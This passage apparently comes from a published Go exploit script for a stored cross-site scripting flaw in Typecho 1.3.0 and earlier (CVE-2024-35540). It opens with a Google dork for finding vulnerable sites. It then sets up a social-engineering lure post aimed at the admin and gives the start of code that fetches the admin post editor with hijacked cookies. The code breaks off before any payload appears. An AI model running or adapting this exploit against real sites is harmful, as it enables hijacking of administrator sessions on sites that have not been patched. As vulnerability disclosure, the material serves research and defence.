// Exploit Title: Typecho <= 1.3.0 Stored Cross-Site Scripting (XSS) // Google Dork: intext:"Powered by Typecho" inurl:/index.php // Date: 18/08/2024 // Exploit Author: Michele 'cyberaz0r' Di Bonaventura // Vendor Homepage: https://typecho.org // Software Link: https://github.com/typecho/typecho // Version: 1.3.0 // Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho) // CVE: CVE-2024-35540 // For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/ package main import ( "bufio" "bytes" "crypto/rand" "crypto/sha256" "encoding/base64" "fmt" "net/http" "net/url" "os" "strings" "time" ) var ( postTitle string = "Reflected XSS PoC" postText string = "Hey admin! Look at the draft of this blog post, can I publish it?" userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" client *http.Client = &http.Client{ CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse }, } ) func getEditUrl(u string, cookies string) string { req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil) if err != nil { fmt.Println("[X] Error creating initial request:", err) return "" } req.Header.Set("Cookie", cookies) req.Header.Set("User-Agent", userAgent) resp, err := client.Do(req) if err != nil { fmt.Println("[X] Error sending initial request:", err) return "" } buf := new(bytes.Buffer) buf.ReadFrom(resp.Body) body := buf.String() if !strings.Contains(body, "